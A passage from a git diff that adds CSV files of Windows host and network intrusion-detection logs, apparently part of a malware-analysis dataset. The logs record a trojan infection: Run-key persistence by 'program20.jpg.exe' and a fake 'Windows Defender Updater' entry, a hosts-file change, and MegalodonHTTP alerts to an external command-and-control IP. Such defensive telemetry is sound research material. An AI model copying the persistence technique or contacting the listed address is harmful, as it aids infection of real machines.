notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 26, 2020 @ 10:53:44.627",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '427bbe75ff504ef7b6735b7d3eddcf81' +New md5sum is : '8e6e7974f2d8d3f529f902963e640b87' +Old sha1sum was: 'bbadb54adc200b55a05b30da8546818b0f7c75b5' +New sha1sum is : '1b06a841f422b9af803da06e6e4f665d140f2d60' +", +"Apr 26, 2020 @ 10:53:44.611",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '4ba4365f07f1541a9d0cb4adc696cbaa' +New md5sum is : 'a5d862c45086d7eb3ecd2008e6e0bf2c' +Old sha1sum was: '6766757ccbe9ec12bc588faf319b992e7bd63e19' +New sha1sum is : '7afcf8aea7a5cd7d080891bbbf5c23efc775d31d' +", +"Apr 26, 2020 @ 10:51:18.556",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +", +"Apr 26, 2020 @ 10:51:18.540",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: 'eec716ae7b147d80b2bff4d347692f12' +New md5sum is : '3ffea4185b0d47e76bb326c56654594e' +Old sha1sum was: '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +New sha1sum is : '5df37dd514d046897a20f77f29c8bcf45b0fb623' +", +"Apr 26, 2020 @ 10:51:07.149",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '74d84c68a87f00e350efb8110a28cff9' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : 'afad60fd27a7feadb6ffcb3e1ea1a2f0d21dde69' +", +"Apr 26, 2020 @ 10:51:07.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : 'db04dbf58a9f7790a2487793afff1eaa' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'ec78476130f9e866512be0cc45a07cb9dd89abad' +", +"Apr 26, 2020 @ 10:50:59.165",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:10:51Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:50:54.774",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '06f3d2f39343f57d32dd262e225aae84' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : 'cc04983290ed793a09187d5412932856395b581c' +", +"Apr 26, 2020 @ 10:50:05.206",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '4fb3bba13c938530aea3422bc2522f8e' +New md5sum is : '427bbe75ff504ef7b6735b7d3eddcf81' +Old sha1sum was: '67a286693aec034ff7ebf4413b445dd59437c852' +New sha1sum is : 'bbadb54adc200b55a05b30da8546818b0f7c75b5' +", +"Apr 26, 2020 @ 10:50:05.194",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'a1b7a53a5551301f83ed8744ce80ef20' +New md5sum is : '4ba4365f07f1541a9d0cb4adc696cbaa' +Old sha1sum was: 'c821e211eae5268acc65fd3cfadebc4d47232039' +New sha1sum is : '6766757ccbe9ec12bc588faf319b992e7bd63e19' +", +"Apr 26, 2020 @ 10:49:55.420",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1636387 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 26, 2020 @ 10:49:31.363",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:49:27.290",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start.""" +"Apr 26, 2020 @ 10:49:25.286",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-08T12:11:17Z. Reason: RulesEngine.""" +"Apr 26, 2020 @ 10:48:31.705",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" +"Apr 26, 2020 @ 10:48:30.236",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)",, +"Apr 26, 2020 @ 10:48:27.157",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'",, diff --git a/data/MW_20_HIDS_3.csv b/data/MW_20_HIDS_3.csv new file mode 100644 index 0000000..b653d40 --- /dev/null +++ b/data/MW_20_HIDS_3.csv @@ -0,0 +1,105 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","full_log" +"May 23, 2020 @ 14:01:55.865",10,"Multiple Windows error events","""Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = DESKTOP-HUE026H; User = NT AUTHORITY\SYSTEM; ClientProcessId = 4968; Component = Unknown; Operation = Start IWbemServices::ExecQuery - root\Microsoft\Windows\DeviceGuard : SELECT RequiredSecurityProperties FROM Win32_DeviceGuard ; ResultCode = 0x80041032; PossibleCause = Unknown""",, +"May 23, 2020 @ 14:00:34.411",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : 'c15d2e9c96671b8872cf0d2a57fec081' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : 'b2af176be91669f2eb3bf9b19bc132d2a738d137' +" +"May 23, 2020 @ 14:00:34.396",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '2fc71ce4c081663302e1c9fa9f610388' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : '57a5eef25dac857d9b917e1964c7aeb308358411' +" +"May 23, 2020 @ 13:59:58.520",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"May 23, 2020 @ 13:59:37.018",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-23 13:59:30.192 +ProcessGuid: {df9fc3d3-2c3b-5ec9-0000-00100b730a00} +ProcessId: 6640 +Image: C:\Users\John Williams\Downloads\program20.jpg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\hetsm.exe +Details: C:\Users\John Williams\Downloads\program20.jpg.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T13:59:30.201635300Z"",""eventRecordID"":""1364"",""processID"":""2176"",""threadID"":""3152"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-23 13:59:30.192\r\nProcessGuid: {df9fc3d3-2c3b-5ec9-0000-00100b730a00}\r\nProcessId: 6640\r\nImage: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\hetsm.exe\r\nDetails: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-23 13:59:30.192"",""processGuid"":""{df9fc3d3-2c3b-5ec9-0000-00100b730a00}"",""processId"":""6640"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\hetsm.exe"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe""}}}" +"May 23, 2020 @ 13:59:05.260",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 23, 2020 @ 13:58:55.522",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 23, 2020 @ 13:58:18.909",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: '497a8c7081c737f07c267a30b1538ff9' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +" +"May 23, 2020 @ 13:55:21.757",7,"Integrity checksum changed.",,,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +" +"May 23, 2020 @ 13:54:03.217",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:54:03.207",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 23, 2020 @ 13:53:56.810",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}' checksum changed. +Old md5sum was: '7b0e21ee99623454e8d06871f064ed98' +New md5sum is : '271f59daf9ca28fbeb0bd234897e1662' +Old sha1sum was: 'f63735bbc2e72216030f4e994b7c9785856a9170' +New sha1sum is : 'e8d6ecabf76ed97cd87dc8593f64cd69ec8ec7a2' +" +"May 23, 2020 @ 13:53:55.731",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '4cea2c835f70071dc02ed62b073dfba8' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '77e72a40def388a760e7dd5d34aee517e6c01817' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +" +"May 23, 2020 @ 13:53:55.715",7,"Integrity checksum changed.",,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'f09b8f706fbbdc831b56268167855de8' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '765494a3d04df5b143fa79ecd655484a9d80378a' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +" +"May 23, 2020 @ 13:53:45.811",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:36.820 +ProcessGuid: {df9fc3d3-d12c-5ec7-0000-00100d391400} +ProcessId: 5604 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\FB_B1D7.tmp.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater +Details: C:\Users\JOHNWI~1\AppData\Local\Temp\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:36.833089600Z"",""eventRecordID"":""930"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:36.820\r\nProcessGuid: {df9fc3d3-d12c-5ec7-0000-00100d391400}\r\nProcessId: 5604\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\FB_B1D7.tmp.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Defender Updater\r\nDetails: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:36.820"",""processGuid"":""{df9fc3d3-d12c-5ec7-0000-00100d391400}"",""processId"":""5604"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\FB_B1D7.tmp.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Windows Defender Updater"",""details"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\cc3a68ce1dad95ce662e1c51f1568e3a.exe / start""}}}" +"May 23, 2020 @ 13:53:44.905",14,"ATT&CK T1060: Suspicious RUN Key from Download","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:18:34.788 +ProcessGuid: {df9fc3d3-d129-5ec7-0000-0010fad01300} +ProcessId: 2624 +Image: C:\Users\John Williams\Downloads\program20.jpg.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\hetsm.exe +Details: C:\Users\John Williams\Downloads\program20.jpg.exe""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:34.796003200Z"",""eventRecordID"":""919"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:34.788\r\nProcessGuid: {df9fc3d3-d129-5ec7-0000-0010fad01300}\r\nProcessId: 2624\r\nImage: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\hetsm.exe\r\nDetails: C:\\Users\\John Williams\\Downloads\\program20.jpg.exe\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:34.788"",""processGuid"":""{df9fc3d3-d129-5ec7-0000-0010fad01300}"",""processId"":""2624"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\hetsm.exe"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program20.jpg.exe""}}}" diff --git a/data/MW_20_NIDS.csv b/data/MW_20_NIDS.csv new file mode 100644 index 0000000..67ef22d --- /dev/null +++ b/data/MW_20_NIDS.csv @@ -0,0 +1,9 @@ +"@timestamp",message,"log.file.path" +"Apr 6, 2020 @ 10:17:20.837","04/06-10:17:16.970363 [**] [1:2022127:3] ET TROJAN MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:17:20.837","04/06-10:17:16.970363 [**] [1:2022818:1] ET TROJAN Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:17:20.835","04/06/2020-10:17:17.204719 [**] [1:2022127:3] ET MALWARE MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:17:20.835","04/06/2020-10:17:17.204719 [**] [1:2022818:3] ET MALWARE Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49721 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.745","04/06/2020-10:11:51.070770 [**] [1:2022127:3] ET MALWARE MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.745","04/06/2020-10:11:51.070770 [**] [1:2022818:3] ET MALWARE Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/suricata/fast.log" +"Apr 6, 2020 @ 10:12:00.735","04/06-10:11:50.715964 [**] [1:2022127:3] ET TROJAN MegalodonHTTP Client Action [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/snort/alert.fast" +"Apr 6, 2020 @ 10:12:00.735","04/06-10:11:50.715964 [**] [1:2022818:1] ET TROJAN Generic gate[.].php GET with minimal headers [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49854 -> 89.208.222.84:80","/var/log/snort/alert.fast" diff --git a/data/MW_21_HIDS_1.csv b/data/MW_21_HIDS_1.csv new file mode 100644 index 0000000..fc5e100 --- /dev/null +++ b/data/MW_21_HIDS_1.csv @@ -0,0 +1,514 @@ +timestamp,"rule.level","rule.description","full_log" +"Apr 6, 2020 @ 13:34:12.332",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'eb0cf951f9de7afccabaea6b60c0dbdf' +New md5sum is : '3c1f1f29b15b6f4d446adbaa7478227e' +Old sha1sum was: '88ef24bc6d4f6900ac8e7ced4ee9d1e398b2fee7' +New sha1sum is : 'd8b476899b5b713c7be8d3ca5bd35f82ec170237' +" +"Apr 6, 2020 @ 13:34:12.316",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4062f37ccf7d56610f362ada03708d00' +New md5sum is : '15547e4fb85460cc47771d918274be6c' +Old sha1sum was: 'f6dd2487084220312ab754081fd9377caef7cb48' +New sha1sum is : '74202fd66188b6ca0549f7734ff08185aa74db9e' +" +"Apr 6, 2020 @ 13:33:16.213",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a22f75cfaec4ad1b3c6df4a877bca015' +New md5sum is : 'ca4d63b3a13c78c0aea16486c81158e5' +Old sha1sum was: 'c661a399d9af12513997815526adef9491bd9698' +New sha1sum is : '7409f0ebded1a5d782ee4fe089e06a887046f653' +" +"Apr 6, 2020 @ 13:31:59.525",7,"Integrity checksum changed.","File 'c:\windows\system32\drivers\etc\hosts' checksum changed. +Size changed from '824' to '2103' +Old md5sum was: '3688374325b992def12793500307566d' +New md5sum is : 'a4eca8014112a13122660b77e6f9eca2' +Old sha1sum was: '4bed0823746a2a8577ab08ac8711b79770e48274' +New sha1sum is : '07cce3458b422d02db7ad9cfbe227369ab2aa072' +Old sha256sum was: '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +New sha256sum is : 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +Old modification time was: 'Tue Mar 19 04:49:40 2019', now it is 'Sat Apr 4 15:55:41 2020' +" +"Apr 6, 2020 @ 13:31:59.424",7,"Integrity checksum changed.","File 'c:\windows\sysnative\drivers\etc\hosts' checksum changed. +Size changed from '824' to '2103' +Old md5sum was: '3688374325b992def12793500307566d' +New md5sum is : 'a4eca8014112a13122660b77e6f9eca2' +Old sha1sum was: '4bed0823746a2a8577ab08ac8711b79770e48274' +New sha1sum is : '07cce3458b422d02db7ad9cfbe227369ab2aa072' +Old sha256sum was: '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +New sha256sum is : 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +Old modification time was: 'Tue Mar 19 04:49:40 2019', now it is 'Sat Apr 4 15:55:41 2020' +" +"Apr 6, 2020 @ 13:31:47.355",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 13:31:43.946",5,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 13:30:47.605",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'b7473c84bd0bad1488a5c2c9e3e6f10e' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '384fc31f48a5bdda9486f16da196a6ca2e287525' +" +"Apr 6, 2020 @ 13:30:47.590",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : 'fa3b7adf38200ede47c4808154156712' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : 'ce3b1ac12870460a712aea1c917e619ec24be518' +" +"Apr 6, 2020 @ 13:30:43.965",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2e21c' was added. +" +"Apr 6, 2020 @ 13:30:43.949",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WpnUserService_2e21c\Security' was added. +" +"Apr 6, 2020 @ 13:30:35.151",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 13:30:35.104",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: '533a94b2450e9da9730f3a8885fa28e2' +New md5sum is : 'eb0cf951f9de7afccabaea6b60c0dbdf' +Old sha1sum was: '9672846ee400d5d6a6606768e5f890ec38b068f7' +New sha1sum is : '88ef24bc6d4f6900ac8e7ced4ee9d1e398b2fee7' +" +"Apr 6, 2020 @ 13:30:35.087",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: 'd63d1a2fa60db9999c4fc04f5bc8fdd6' +New md5sum is : '4062f37ccf7d56610f362ada03708d00' +Old sha1sum was: '41b7674c2a780a3d91a2498b0320f63b453edc78' +New sha1sum is : 'f6dd2487084220312ab754081fd9377caef7cb48' +" +"Apr 6, 2020 @ 13:30:34.291",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '0b3936dadbdfaec6b81d713fa992d6f4' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'c7a478d2a4a0a4263d4e588e787fdb7365123205' +" +"Apr 6, 2020 @ 13:30:33.122",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'b6c30bd0f7982fcdb50ea0551b18b76a' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '92e731a5f80369750a273e8b7706936de9fee902' +" +"Apr 6, 2020 @ 13:30:32.713",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 